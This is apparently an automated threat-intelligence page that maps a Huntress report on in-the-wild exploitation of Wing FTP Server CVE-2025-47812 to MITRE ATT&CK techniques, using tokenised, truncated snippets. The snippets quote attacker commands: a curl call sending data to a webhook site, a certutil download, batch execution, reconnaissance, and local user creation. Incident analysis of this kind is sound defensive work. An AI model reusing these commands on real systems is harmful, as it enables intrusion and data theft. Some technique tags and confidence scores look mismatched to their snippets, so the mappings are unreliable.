TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Wing FTP Server RCE (CVE-2025-47812) Exploited in the Wild | Huntress

2025-07-10 · Read original ↗

ATT&CK techniques detected

18 predictions
T1059.001PowerShell
99%
“, and extracted the connection string from it : instance - y9tbyl - relay. screenconnect [. ] com. there was no evidence that they tried to run the msi file or that screenconnect was installed. at this point, they may have “ phoned a friend ” since another attacker connected to t…”
T1059.003Windows Command Shell
98%
“##e / c c : / 1. bat - c : \ windows \ system32 \ cmd. exe / c cmd. exe / c c : / 1. bat - c : \ windows \ system32 \ cmd. exe / c whoami a lua file appeared on the system, which would have effectively downloaded the aforementioned missing batch file, except that they messed up t…”
T1059.001PowerShell
97%
“heading ” ( soh ) character. it ’ s unclear how or why they even managed to type that out. there were also tabs in the paths for the test file where they had redirected their output for some reason, which resulted in failure : figure 3 : visual of just how badly typed some of the…”
T1136.001Local Account
94%
“a - c : \ windows \ system32 \ cmd. exe / c curl - help - c : \ windows \ system32 \ cmd. exe / c whoami - c : \ windows \ system32 \ cmd. exe / c nslookup - c : \ windows \ system32 \ cmd. exe / c whoami - all we also observed the adversary creating new users for persistence : -…”
T1059.003Windows Command Shell
93%
“information. a typical session file may look as such : _ session [ ' username ' ] = [ [ johndoe ] ] _ session [ ' ipaddress ' ] = [ [ 123. 123. 123. 123 ] ] _ session [ ' currentpath ' ] = [ [ / ] ] to contrast, our adversary passed a valid lua function that contained a hex - enc…”
T1059.003Windows Command Shell
87%
“could connect to the victim ’ s machine. they made several connection attempts within a 12 - minute time span. almost an hour later, connections began from a second ip address, attempting several connection attempts. figure 2 : timeline of first series of the attacks at this poin…”
T1059.003Windows Command Shell
86%
“c curl - help - c : \ windows \ system32 \ cmd. exe / c curl - s - d con https : / / webhook [. ] site / 5d112487 - 6133 - 4942 - ac87 - 3f473d44bd81 > nul while the webhook endpoint is now expired and offline, we could see the connection made from the target host, including the …”
T1190Exploit Public-Facing Application
82%
“21. [ 01 ] mon, 07 jul 2025 12 : 51 : 24 ftps server starts listening on port 990. [ 01 ] mon, 07 jul 2025 12 : 51 : 24 http server starts listening on port 80. [ 01 ] mon, 07 jul 2025 12 : 51 : 24 https server starts listening on port 443. [ 06 ] mon, 07 jul 2025 12 : 56 : 26 ( …”
T1059.006Python
79%
“session [ ' currentpath ' ] = [ [ / ] ] if we decode the hex blob in the hx ( ) function above using python, we get the following command, which was attempted to execute on the host : % python3 - c ' print ( bytes. fromhex ( " " ). decode ( " ascii " ) ) ' certutil - urlcache - f…”
T1190Exploit Public-Facing Application
77%
“using the null byte in the username parameter. huntress first observed exploitation on a customer on july 1, 2025, just a day after the initial write - up was published. exploitation activity underneath the wing ftp server process wftpserver. exe began to ramp up at 16 : 15 utc a…”
T1190Exploit Public-Facing Application
56%
“wing ftp server rce ( cve - 2025 - 47812 ) exploited in the wild | huntress summary tl ; dr : huntress saw active exploitation of wing ftp server remote code execution ( cve - 2025 - 47812 ) on a customer on july 1, 2025. organizations running wing ftp server should update to the…”
T1564.003Hidden Window
56%
“, and extracted the connection string from it : instance - y9tbyl - relay. screenconnect [. ] com. there was no evidence that they tried to run the msi file or that screenconnect was installed. at this point, they may have “ phoned a friend ” since another attacker connected to t…”
T1059.003Windows Command Shell
54%
“[ / ] ] they then tried to run their batch file one more time. this must have been frustrating for them when it didn ’ t work : c : \ windows \ system32 \ cmd. exe / c cmd. exe / c c : / 1. bat figure 6 : attacker ( probably ) trying to figure out why they are failing at this poi…”
T1071.001Web Protocols
52%
“could connect to the victim ’ s machine. they made several connection attempts within a 12 - minute time span. almost an hour later, connections began from a second ip address, attempting several connection attempts. figure 2 : timeline of first series of the attacks at this poin…”
T1204.002Malicious File
47%
“##ver. exe process, as well as entries at the same time in the application event log with ids 1000, and 1001, for wftpserver. exe. c : \ windows \ system32 \ werfault. exe - u - p 3792 - s 4744 thus concluded the painful journey of these attackers, as the machine was also isolate…”
T1033System Owner/User Discovery
45%
“##32 \ cmd. exe / c net user - c : \ windows \ system32 \ cmd. exe / c net user / all - c : \ windows \ system32 \ cmd. exe / c whoami - c : \ windows \ system32 \ cmd. exe / c net user wing - c : \ windows \ system32 \ cmd. exe / c arp - a - c : \ windows \ system32 \ cmd. exe /…”
T1087.001Local Account
40%
“##32 \ cmd. exe / c net user - c : \ windows \ system32 \ cmd. exe / c net user / all - c : \ windows \ system32 \ cmd. exe / c whoami - c : \ windows \ system32 \ cmd. exe / c net user wing - c : \ windows \ system32 \ cmd. exe / c arp - a - c : \ windows \ system32 \ cmd. exe /…”
T1195.002Compromise Software Supply Chain
31%
“##ver. exe process, as well as entries at the same time in the application event log with ids 1000, and 1001, for wftpserver. exe. c : \ windows \ system32 \ werfault. exe - u - p 3792 - s 4744 thus concluded the painful journey of these attackers, as the machine was also isolate…”

Summary

Huntress discovered active exploitation of Wing FTP Server RCE (CVE-2025-47812). Learn more about the injection flaw, attack timeline, forensic artifacts, and how to protect your organization.